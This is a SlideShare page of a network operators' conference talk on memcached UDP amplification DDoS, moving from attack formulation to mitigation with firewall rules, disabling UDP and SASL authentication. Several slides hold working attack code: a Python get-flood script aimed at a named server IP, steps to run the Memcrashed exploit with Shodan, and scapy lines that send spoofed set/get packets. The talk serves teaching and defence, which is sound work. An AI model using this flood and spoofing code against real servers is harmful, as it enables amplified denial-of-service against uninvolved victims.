SlideShare une entreprise Scribd logo

Memcache as udp traffic reflector

Bangladesh Network Operators Group
Bangladesh Network Operators Group

Memcacheas UDP Reflectors: A Massive Amplified DDoSthe World(Attack Formulation and Mitigation) by Muhammad Morshed Alam, AmberIT Limited.morshed@amberit.com.bd

Internet
1  sur  28
Télécharger pour lire hors ligne
Memcache as UDP Reflectors: A Massive Amplified DDoS the World (Attack Formulation and Mitigation) Presenter Muhammad Morshed Alam AmberIT Limited morshed@amberit.com.bd <Abror Netwroks> <Shodan Stats>
Outlines • Memcache overview • Memcache Variables and Commands • Memcache DDoS Amplification Attack formulation, Amplification Factor • Memcache DDoS Tools (set and get requests, spoof UDP packets) • Mitigation (securing memcache servers using firewall and SASL authentication)
Memcached Overview • Free & open source, high-performance, distributed memory object caching system • Uses key-value to store arbitrary data (strings, objects) • Set (key, Data) <= save the data in key Get(key) => give the data from key • add, delete and replace commands to strictly insert/remove data in a key • Optimizes backend database performance by temporarily storing information in cache memory
Memcached Mitigates the Load from DB Speed up the Web App Response
Install Memcache Service # sudo apt-get update # sudo apt-get install memcached # sudo apt-get install libmemcached-tools Check the running process: root@bdnog-memcace:~# ps aux |grep memcache Output: memcache 207 0.0 0.1 63388 1952 ? Ssl Apr12 0:02 /usr/bin/memcached -m 64 -p 11211 -u memcache -l 127.0.0.1
Install Memcache Service Contd.. Verify open ports with the ss command or netstat command: # ss -tulpn | grep :11211 # netstat -tulpn | grep :11211 Configuration file: # sudo vi /etc/memcached.conf Service restart process: # sudo systemctl restart memcached
Memcache Variables and Commands: Connecting to the Memcache service: root@bdnog-memcace:~# telnet 127.0.0.1 11211 Trying 127.0.0.1... Connected to 127.0.0.1. Escape character is '^]'. stats STAT pid 12476 STAT uptime 20 STAT time 1524726956 STAT version 1.4.25 Ubuntu STAT libevent 2.0.21-stable STAT pointer_size 64 STAT rusage_user 0.008000 STAT rusage_system 0.004000 STAT curr_connections 1 STAT total_connections 2 STAT connection_structures 2 STAT reserved_fds 20 STAT cmd_get 0 STAT cmd_set 0 STAT cmd_flush 0 STAT cmd_touch 0 STAT get_hits 0 STAT get_misses 0 STAT delete_misses 0 STAT delete_hits 0 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 0 STAT cas_hits 0 STAT cas_badval 0 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 7 STAT bytes_written 0 STAT limit_maxbytes 67108864 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT time_in_listen_disabled_us 0 STAT threads 4 STAT conn_yields 0 STAT hash_power_level 16 STAT hash_bytes 524288 STAT hash_is_expanding 0 STAT malloc_fails 0 STAT bytes 0 STAT curr_items 0 STAT total_items 0 STAT expired_unfetched 0 STAT evicted_unfetched 0 STAT evictions 0 STAT reclaimed 0 STAT crawler_reclaimed 0 STAT crawler_items_checked 0 STAT lrutail_reflocked 0 END
Memcache-tools and outputs # Setting data for a Key : set key 0 3600 16 Welcome to BDNog STORED # Getting return the value of key: get key VALUE key 0 16 Welcome to BDNog END Using of libmemcached-tools command: root@bdnog-memcace:~# memcstat --servers 127.0.0.1 Output: Give the present status of all memcache variables, i.e., STAT cmd_get 1 STAT cmd_set 1 root@bdnog-memcace:~# memcdump --servers 127.0.0.1 Output: All available keys that holding the data of cache, i.e., Key root@bdnog-memcace:~# memcat --servers 127.0.0.1 key Output: return the value of that key, i.e., Welcome to BDNog set <keyname> <some_flag> <expiration_in_millseconds> <length_of_data_to_follow>
Vulnerable Memcached Server • No authentication required to access • unauthorized inject big payload in cache • Listen on unreliable UDP/Port 11211 from any IP address • UDP allows unreliable data delivery, Target hosts receive data without prior consent stats of vulnerable memcached services available in internet (Qrator Lab and Akamai)
1. Finds a memcache vulnerable server listening at UDP , port 11211 and high max size value of the variable limit_maxbytes 2. Run a memcache SET command and fills 1 key to it’s max size with data to ensure high payload 3. Sends multiple forged GET requests for that key using continuous UDP and spoof victim IP Attacker’s UDP Packets Contained: •UDP GET key requests •Size: 15B, SRC IP: spoof Target IP, DST Port:11211, Des. IP: Memcahe Host Vulnerable Memcached servers exposed at Internet and listening at UDP, Port: 11211 <Victims/Targets>  GET commands reflected to the victim IP with (key, value)  Value of DATA is high, i.e, T. Size=(key, value)*# of requests  GET Request 15B=> 750kB response, 50000x amplification (Akamai Report)  SRC IP: Memcache host, DST IP: Target, SRC Port: 11211 Attack Formulation
1. Attacker may user multiple vulnerable memcached servers to a specific target IP by spoofing the SRC IP 2. Target network infra. overwhelmed with UDP Traffic Memcache Amplification DDoS on bandwidth consumption
Trends of Protocols Used for Reflection Most DDoS counted for Memcache (DDoSmon stats)
DDoS attack bandwidth 1.3 Tbps on Github !!!
Memcached Reflection Power Inserting key value to a vulnerable memcached server: # apt-get install python-memcache # python >>> import memcache >>> mc=memcache.Client([‘1.2.3.4:11211'],debug=True) >>> mc.set(‘tot2',3423443534324234234234234) True >>> mc.get(‘tot2') 3423443534324234234234234 Max Key Value (size) => 1 MB, repeating the get request for 1024 times => 1024 MB (1GB) reflected UDP Traffic !!!! 
Flooding the resource with Reflected UDP Traffic: # touch get_flood.py #!/usr/bin/env python import memcache mc = memcache.Client([‘202.4.96.85:11211'],debug=True) mc.set('tot2',1347534875923423432423) for i in range(10000): mc.get('tot2') print i root@morshed-Lenovo-G40-70:~#python get_flood.py MemCached: MemCache: inet:202.4.96.85:11211: connect: timed out. Marking dead.
Dump Packets: Memcache ServerGet Requests Sender
Dump Output Packets:
Dump Output Packets (PPS Curve) :
Memcached DDoS Tools Sends forged UDP packets (Spoof the SRC IP/Target IP) to vulnerable Memcached servers obtained using Shodan API # git clone https://github.com/649/Memcrashed-DDoS-Exploit.git # apt-get install python3 # pip install shodan ;search engine # pip install scapy ; require to manipulate UDP packets Pass the API key collected from https://account.shodan.io/login and put the target victim IP address to run the attack # python3 Memcrashed.py ;x00injected is the key and some arbitary value in inserted to cache setdata = ("x00x00x00x00x00x00x00x00setx00injectedx000x003600x00%srn%srn" getdata = ("x00x00x00x00x00x00x00x00getx00injectedrn") ;using scapy SRC IP manupluation and sending get request on behalf of victim/Target IP send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=setdata) send(IP(src=target, dst='%s' % i) / UDP(sport=int(str(targetport)),dport=11211)/Raw(load=getdata)
Dump Data:
Mitigation
Step-1: Configuring The Firewall: For TCP: # /sbin/iptables -A INPUT -p tcp -s 172.16.11.0/24 --dport 11211 -j ACCEPT # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP For UDP: # /sbin/iptables -A INPUT -p udp -s 172.16.11.0/24 --dport 11211 -j ACCEPT # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP Or permanently Disable for zimbra colaboration: # /sbin/iptables -A INPUT -p tcp --dport 11211 -j DROP # /sbin/iptables -A INPUT -p udp --dport 11211 -j DROP Note: Save the iptables rules and check the rules # iptables –L -v -n Secure memcached server to avoid DDoS amplification attacks
Step-2: Changing the Configuration: # sudo vim /etc/memcached.conf -l 127.0.0.1,172.16.3.1 ;listening from localhost and trusted block -U 0 ;disable UDP 11211 listening # sudo systemctl restart memcached Secure memcached server to avoid DDoS amplification attacks contd…
Validation of filtering rules: # nc 202.4.96.144 11211 # nc -u 202.4.96.144 11211 # telnet 202.4.96.144 11211 # sudo nmap 202.4.96.144 -p 11211 -sU -sS --script memcached- info
Adding Authorized user using SASL to Memcached Server: # memcstat --servers="127.0.0.1“ Output: Server: 127.0.0.1 (11211) pid: 3831 uptime: 9 time: 1520028517, version: 1.4.25 . . . SASL helps to add authentication for memcached servers clients. # sudo vim /etc/memcached.conf -S ;enable SASL -vv ;enable verbose output to /var/log/memcached Save and close the file. # sudo systemctl restart memcached # sudo journalctl -u memcached Output: Apr 27 22:03:58 memcached systemd-memcached-wrapper[2760]: Initialized SASL.
Adding Authorized user using SASL to Memcached Server: # sudo apt-get install sasl2-bin ; SASL user database # sudo mkdir -p /etc/sasl2 # sudo vi /etc/sasl2/memcached.conf mech_list: plain log_level: 5 sasldb_path: /etc/sasl2/memcached-sasldb2 # sudo saslpasswd2 -a memcached -c -f /etc/sasl2/memcached- sasldb2 morshed # sudo systemctl restart memcached # memcstat --servers="127.0.0.1" --username=morshed --password=*passwd*
Memcache as udp traffic reflector

Recommandé

Ad, dns, dhcp, file server
Ad, dns, dhcp, file serverAd, dns, dhcp, file server
Ad, dns, dhcp, file serverTola LENG
 
Monitoring with Ganglia
Monitoring with GangliaMonitoring with Ganglia
Monitoring with GangliaFastly
 
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Tola LENG
 
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...Chanwoo Choi
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_trainingvideos
 
DNS windows server(2008R2) & linux(SLES 11)
DNS windows server(2008R2) & linux(SLES 11)DNS windows server(2008R2) & linux(SLES 11)
DNS windows server(2008R2) & linux(SLES 11)Tola LENG
 
PostgresOpen 2013 A Comparison of PostgreSQL Encryption Options
PostgresOpen 2013 A Comparison of PostgreSQL Encryption OptionsPostgresOpen 2013 A Comparison of PostgreSQL Encryption Options
PostgresOpen 2013 A Comparison of PostgreSQL Encryption OptionsFaisal Akber
 
Juniper Srx quickstart-12.1r3
Juniper Srx quickstart-12.1r3Juniper Srx quickstart-12.1r3
Juniper Srx quickstart-12.1r3Mohamed Al-Natour
 

Recommandé

Ad, dns, dhcp, file server
Ad, dns, dhcp, file serverAd, dns, dhcp, file server
Ad, dns, dhcp, file serverTola LENG
 
Monitoring with Ganglia
Monitoring with GangliaMonitoring with Ganglia
Monitoring with GangliaFastly
 
Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Configure Proxy and Firewall (Iptables)
Configure Proxy and Firewall (Iptables)Tola LENG
 
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...
OpenIot & ELC Europe 2016 Berlin - How to develop the ARM 64bit board, Samsun...Chanwoo Choi
 
9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_training9 creating cent_os 7_mages_for_dpdk_training
9 creating cent_os 7_mages_for_dpdk_trainingvideos
 
DNS windows server(2008R2) & linux(SLES 11)
DNS windows server(2008R2) & linux(SLES 11)DNS windows server(2008R2) & linux(SLES 11)
DNS windows server(2008R2) & linux(SLES 11)Tola LENG
 
PostgresOpen 2013 A Comparison of PostgreSQL Encryption Options
PostgresOpen 2013 A Comparison of PostgreSQL Encryption OptionsPostgresOpen 2013 A Comparison of PostgreSQL Encryption Options
PostgresOpen 2013 A Comparison of PostgreSQL Encryption OptionsFaisal Akber
 
Juniper Srx quickstart-12.1r3
Juniper Srx quickstart-12.1r3Juniper Srx quickstart-12.1r3
Juniper Srx quickstart-12.1r3Mohamed Al-Natour
 
DPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabDPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabMichelle Holley
 
How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7Tola LENG
 
Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8Jamil Jamil
 
R bernardino hand_in_assignment_week_1
R bernardino hand_in_assignment_week_1R bernardino hand_in_assignment_week_1
R bernardino hand_in_assignment_week_1Raul Bernardino, BSc MSc
 
在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群maclean liu
 
Configure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-RelayConfigure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-RelayTola LENG
 
DNS, DHCP Configuration
DNS, DHCP Configuration DNS, DHCP Configuration
DNS, DHCP Configuration Anik Saha
 
Awrrpt 1 3004_3005
Awrrpt 1 3004_3005Awrrpt 1 3004_3005
Awrrpt 1 3004_3005Kam Chan
 
Hadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup InsightsHadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup InsightsSruthi Kumar Annamnidu
 
Configure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux EnterpriseConfigure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux EnterpriseTola LENG
 
Open Source Networking with Vyatta
Open Source Networking with VyattaOpen Source Networking with Vyatta
Open Source Networking with VyattaMatthew Turland
 
Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPFIvan Babrou
 
IPTABLES
IPTABLESIPTABLES
IPTABLESTan Huynh Cong
 
How deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performanceHow deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performanceCumulus Networks
 
Ceph issue 해결 사례
Ceph issue 해결 사례Ceph issue 해결 사례
Ceph issue 해결 사례Open Source Consulting
 
Open vpn server_linux
Open vpn server_linuxOpen vpn server_linux
Open vpn server_linuxTola LENG
 
Banv
BanvBanv
Banvnetvis
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?Men and Mice
 
Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2Cong Zhang
 
Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Mohammad Reza Kamalifard
 
Oracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodOracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodLudovico Caldara
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 

Contenu connexe

Tendances

DPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabDPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabMichelle Holley
 
How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7Tola LENG
 
Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8Jamil Jamil
 
在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群maclean liu
 
Configure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-RelayConfigure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-RelayTola LENG
 
DNS, DHCP Configuration
DNS, DHCP Configuration DNS, DHCP Configuration
DNS, DHCP Configuration Anik Saha
 
Awrrpt 1 3004_3005
Awrrpt 1 3004_3005Awrrpt 1 3004_3005
Awrrpt 1 3004_3005Kam Chan
 
Hadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup InsightsHadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup InsightsSruthi Kumar Annamnidu
 
Configure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux EnterpriseConfigure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux EnterpriseTola LENG
 
Open Source Networking with Vyatta
Open Source Networking with VyattaOpen Source Networking with Vyatta
Open Source Networking with VyattaMatthew Turland
 
Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPFIvan Babrou
 
How deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performanceHow deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performanceCumulus Networks
 
Open vpn server_linux
Open vpn server_linuxOpen vpn server_linux
Open vpn server_linuxTola LENG
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?Men and Mice
 
Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2Cong Zhang
 

Tendances (19)

DPDK in Containers Hands-on Lab
DPDK in Containers Hands-on LabDPDK in Containers Hands-on Lab
DPDK in Containers Hands-on Lab
 
How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7How to configure IPA-Server & Client-Centos 7
How to configure IPA-Server & Client-Centos 7
 
Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8Tonyfortunatoiperfquickstart 1212633021928769-8
Tonyfortunatoiperfquickstart 1212633021928769-8
 
R bernardino hand_in_assignment_week_1
R bernardino hand_in_assignment_week_1R bernardino hand_in_assignment_week_1
R bernardino hand_in_assignment_week_1
 
在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群在Aix6.1上安装11g r2 rac grid infrastructure集群
在Aix6.1上安装11g r2 rac grid infrastructure集群
 
Configure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-RelayConfigure DHCP Server and DHCP-Relay
Configure DHCP Server and DHCP-Relay
 
DNS, DHCP Configuration
DNS, DHCP Configuration DNS, DHCP Configuration
DNS, DHCP Configuration
 
Awrrpt 1 3004_3005
Awrrpt 1 3004_3005Awrrpt 1 3004_3005
Awrrpt 1 3004_3005
 
Hadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup InsightsHadoop Cluster - Basic OS Setup Insights
Hadoop Cluster - Basic OS Setup Insights
 
Configure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux EnterpriseConfigure Webserver & SSL secure & redirect in SuSE Linux Enterprise
Configure Webserver & SSL secure & redirect in SuSE Linux Enterprise
 
Open Source Networking with Vyatta
Open Source Networking with VyattaOpen Source Networking with Vyatta
Open Source Networking with Vyatta
 
Debugging linux issues with eBPF
Debugging linux issues with eBPFDebugging linux issues with eBPF
Debugging linux issues with eBPF
 
IPTABLES
IPTABLESIPTABLES
IPTABLES
 
How deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performanceHow deep is your buffer – Demystifying buffers and application performance
How deep is your buffer – Demystifying buffers and application performance
 
Ceph issue 해결 사례
Ceph issue 해결 사례Ceph issue 해결 사례
Ceph issue 해결 사례
 
Open vpn server_linux
Open vpn server_linuxOpen vpn server_linux
Open vpn server_linux
 
Banv
BanvBanv
Banv
 
What is new in BIND 9.11?
What is new in BIND 9.11?What is new in BIND 9.11?
What is new in BIND 9.11?
 
Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2Using ngx_lua in UPYUN 2
Using ngx_lua in UPYUN 2
 

Similaire à Memcache as udp traffic reflector

Oracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodOracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodLudovico Caldara
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/StableSR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stablejuet-y
 
7 hands on
7 hands on7 hands on
7 hands onvideos
 
Monitoring InfluxEnterprise
Monitoring InfluxEnterpriseMonitoring InfluxEnterprise
Monitoring InfluxEnterpriseInfluxData
 
SR-IOV+KVM on Debian/Stable
SR-IOV+KVM on Debian/StableSR-IOV+KVM on Debian/Stable
SR-IOV+KVM on Debian/Stablejuet-y
 
Configure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdfConfigure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdfBT Digital
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalabilityWim Godden
 
AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)Amazon Web Services
 
(NET404) Making Every Packet Count
(NET404) Making Every Packet Count(NET404) Making Every Packet Count
(NET404) Making Every Packet CountAmazon Web Services
 
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...NETWAYS
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemCyber Security Alliance
 
CEPH中的QOS技术
CEPH中的QOS技术CEPH中的QOS技术
CEPH中的QOS技术suncbing1
 
Tópicos - LVS Instalacao Slack11
Tópicos - LVS Instalacao Slack11Tópicos - LVS Instalacao Slack11
Tópicos - LVS Instalacao Slack11Luiz Arthur
 
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPKonfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPWalid Umar
 
Modul dhcp server menggunakan mikrotik os
Modul dhcp server menggunakan mikrotik osModul dhcp server menggunakan mikrotik os
Modul dhcp server menggunakan mikrotik osEen Pahlefi
 
Cisco asa firewall command line technical guide
Cisco asa firewall command line technical guideCisco asa firewall command line technical guide
Cisco asa firewall command line technical guideMDEMARCOCCIE
 
1.4.2-basic-configuration-with-mikrotik-cli.pdf
1.4.2-basic-configuration-with-mikrotik-cli.pdf1.4.2-basic-configuration-with-mikrotik-cli.pdf
1.4.2-basic-configuration-with-mikrotik-cli.pdfDeivysVargas
 

Similaire à Memcache as udp traffic reflector (20)

Pycon - Python for ethical hackers
Pycon - Python for ethical hackers Pycon - Python for ethical hackers
Pycon - Python for ethical hackers
 
Oracle Client Failover - Under The Hood
Oracle Client Failover - Under The HoodOracle Client Failover - Under The Hood
Oracle Client Failover - Under The Hood
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/StableSR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
SR-IOV, KVM and Emulex OneConnect 10Gbps cards on Debian/Stable
 
7 hands on
7 hands on7 hands on
7 hands on
 
Monitoring InfluxEnterprise
Monitoring InfluxEnterpriseMonitoring InfluxEnterprise
Monitoring InfluxEnterprise
 
SR-IOV+KVM on Debian/Stable
SR-IOV+KVM on Debian/StableSR-IOV+KVM on Debian/Stable
SR-IOV+KVM on Debian/Stable
 
Configure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdfConfigure Mikrotik Khmer.pdf
Configure Mikrotik Khmer.pdf
 
Caching and tuning fun for high scalability
Caching and tuning fun for high scalabilityCaching and tuning fun for high scalability
Caching and tuning fun for high scalability
 
AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)AWS re:Invent 2016: Making Every Packet Count (NET404)
AWS re:Invent 2016: Making Every Packet Count (NET404)
 
(NET404) Making Every Packet Count
(NET404) Making Every Packet Count(NET404) Making Every Packet Count
(NET404) Making Every Packet Count
 
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
OSMC 2019 | Use Cloud services & features in your redundant Icinga2 Environme...
 
Reverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande ModemReverse engineering Swisscom's Centro Grande Modem
Reverse engineering Swisscom's Centro Grande Modem
 
The Art of Grey-Box Attack
The Art of Grey-Box AttackThe Art of Grey-Box Attack
The Art of Grey-Box Attack
 
CEPH中的QOS技术
CEPH中的QOS技术CEPH中的QOS技术
CEPH中的QOS技术
 
Tópicos - LVS Instalacao Slack11
Tópicos - LVS Instalacao Slack11Tópicos - LVS Instalacao Slack11
Tópicos - LVS Instalacao Slack11
 
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCPKonfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
Konfigurasi Server Gateway dengan fitur PROXY, WEBSERVER dan DHCP
 
Modul dhcp server menggunakan mikrotik os
Modul dhcp server menggunakan mikrotik osModul dhcp server menggunakan mikrotik os
Modul dhcp server menggunakan mikrotik os
 
Cisco asa firewall command line technical guide
Cisco asa firewall command line technical guideCisco asa firewall command line technical guide
Cisco asa firewall command line technical guide
 
1.4.2-basic-configuration-with-mikrotik-cli.pdf
1.4.2-basic-configuration-with-mikrotik-cli.pdf1.4.2-basic-configuration-with-mikrotik-cli.pdf
1.4.2-basic-configuration-with-mikrotik-cli.pdf
 

Plus de Bangladesh Network Operators Group

Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and CephAccelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and CephBangladesh Network Operators Group
 
Contents Localization Initiatives to get better User Experience
Contents Localization Initiatives to get better User ExperienceContents Localization Initiatives to get better User Experience
Contents Localization Initiatives to get better User ExperienceBangladesh Network Operators Group
 
Re-define network visibility for capacity planning & forecasting with Grafana
Re-define network visibility for capacity planning & forecasting with GrafanaRe-define network visibility for capacity planning & forecasting with Grafana
Re-define network visibility for capacity planning & forecasting with GrafanaBangladesh Network Operators Group
 

Plus de Bangladesh Network Operators Group (20)

Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and CephAccelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
Accelerating Hyper-Converged Enterprise Virtualization using Proxmox and Ceph
 
Recent IRR changes by Yoshinobu Matsuzaki, IIJ
Recent IRR changes by Yoshinobu Matsuzaki, IIJRecent IRR changes by Yoshinobu Matsuzaki, IIJ
Recent IRR changes by Yoshinobu Matsuzaki, IIJ
 
Fact Sheets : Network Status in Bangladesh
Fact Sheets : Network Status in BangladeshFact Sheets : Network Status in Bangladesh
Fact Sheets : Network Status in Bangladesh
 
AI Driven Wi-Fi for the Bottom of the Pyramid
AI Driven Wi-Fi for the Bottom of the PyramidAI Driven Wi-Fi for the Bottom of the Pyramid
AI Driven Wi-Fi for the Bottom of the Pyramid
 
IPv6 Security Overview by QS Tahmeed, APNIC RCT
IPv6 Security Overview by QS Tahmeed, APNIC RCTIPv6 Security Overview by QS Tahmeed, APNIC RCT
IPv6 Security Overview by QS Tahmeed, APNIC RCT
 
Network eWaste : Community role to manage end of life Product
Network eWaste : Community role to manage end of life ProductNetwork eWaste : Community role to manage end of life Product
Network eWaste : Community role to manage end of life Product
 
A plenarily integrated SIEM solution and it’s Deployment
A plenarily integrated SIEM solution and it’s DeploymentA plenarily integrated SIEM solution and it’s Deployment
A plenarily integrated SIEM solution and it’s Deployment
 
IPv6 Deployment in South Asia 2022
IPv6 Deployment in South Asia 2022IPv6 Deployment in South Asia 2022
IPv6 Deployment in South Asia 2022
 
Introduction to Software Defined Networking (SDN)
Introduction to Software Defined Networking (SDN)Introduction to Software Defined Networking (SDN)
Introduction to Software Defined Networking (SDN)
 
RPKI Deployment Status in Bangladesh
RPKI Deployment Status in BangladeshRPKI Deployment Status in Bangladesh
RPKI Deployment Status in Bangladesh
 
An Overview about open UDP Services
An Overview about open UDP ServicesAn Overview about open UDP Services
An Overview about open UDP Services
 
12 Years in DNS Security As a Defender
12 Years in DNS Security As a Defender12 Years in DNS Security As a Defender
12 Years in DNS Security As a Defender
 
Contents Localization Initiatives to get better User Experience
Contents Localization Initiatives to get better User ExperienceContents Localization Initiatives to get better User Experience
Contents Localization Initiatives to get better User Experience
 
BdNOG-20220625-MT-v6.0.pptx
BdNOG-20220625-MT-v6.0.pptxBdNOG-20220625-MT-v6.0.pptx
BdNOG-20220625-MT-v6.0.pptx
 
